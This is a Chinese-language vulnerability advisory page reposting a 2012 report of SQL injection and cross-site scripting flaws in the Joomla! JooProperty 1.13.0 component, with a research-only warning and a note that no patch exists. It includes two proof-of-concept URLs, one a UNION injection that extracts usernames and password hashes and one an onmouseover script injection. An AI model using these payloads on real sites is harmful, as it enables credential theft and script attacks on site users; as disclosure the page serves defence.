Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Joomla! JooProperty 组件SQL注入和跨站脚本漏洞

发布日期:2012-12-11
更新日期:2012-12-17受影响系统:
Joomla! JooProperty 1.13.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 56885Joomla! JooProperty是针对Joomla 1.7、2.5开发的房地产组件。JooProperty 1.13.0及其他版本在实现上存在安全漏洞,攻击者可利用这些漏洞在受影响站点的用户浏览器中执行任意脚本代码和未授权操作数据库。<*来源:Daniel Barragan
 
  链接:http://packetstormsecurity.org/files/118741/joomlajooproperty-sqlxss.txt
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/?option=com_jooproperty&amp;amp;view=booking&amp;amp;layout=modal&amp;amp;product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4Rhttp://www.example.com/layout=modal&amp;amp;option=com_jooproperty&amp;amp;product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&amp;amp;view=booking建议:
--------------------------------------------------------------------------------
厂商补丁:Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.jooproperty.com/en/subscriptions/levels.htmlAndroid Kernel 2.6本地拒绝服务漏洞Drupal OM Maximenu模块任意PHP代码执行漏洞相关资讯      Joomla!  跨站脚本漏洞  Joomla! 安全漏洞 
  • Joomla! Huge-IT Catalog   (今 20:48)
  • Joomla! SQL注入漏洞(CVE-2015-  (10/30/2015 17:23:26)
  • Joomla! JV Comment扩展"id"参数  (02/10/2014 21:23:28)
  • Joomla! com_contenthistory组件信  (10/31/2015 08:23:45)
  • Joomla! "index.php" SQL注入漏洞  (04/02/2014 11:41:41)
  • Joomla! redSHOP组件“pid” SQL注  (08/12/2013 14:05:06)
本文评论 查看全部评论 (0)
表情: 姓名: 字数